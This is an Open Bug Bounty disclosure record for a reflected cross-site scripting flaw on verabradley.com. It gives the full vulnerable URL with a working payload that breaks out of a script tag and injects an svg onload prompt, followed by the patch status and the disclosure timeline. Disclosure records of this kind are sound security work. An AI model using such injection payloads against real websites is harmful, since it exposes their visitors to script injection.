Vulnerable URL:
http://www.verabradley.com/browse/_/?Ntt=test%22%3C/script%3E%3Csvg%20onload=onload=prompt(%22OPENBUGBOUNTY%22)%3E
Details:
Description |
Value |
Patched: |
Yes, at 27.07.2017 |
Latest check for patch: |
27.07.2017 22:40 GMT |
Vulnerability type: |
XSS |
Vulnerability status: |
Publicly disclosed |
Alexa Rank |
14690 |
VIP website status: |
Yes |
Check verabradley.com SSL connection: |
(Grade: A-) |
Coordinated Disclosure Timeline:
Description |
Value |
Vulnerability submitted via Open Bug Bounty |
22 July, 2016 12:58 GMT |
Generic security notifications sent to website owner |
22 July, 2016 13:01 GMT |
Notification sent to subscribers (without technical details) |
22 July, 2016 14:17 GMT |
Vulnerability details disclosed by researcher |
5 August, 2016 13:12 GMT |
Vulnerability patched by the website owner |
27 July, 2017 22:40 GMT |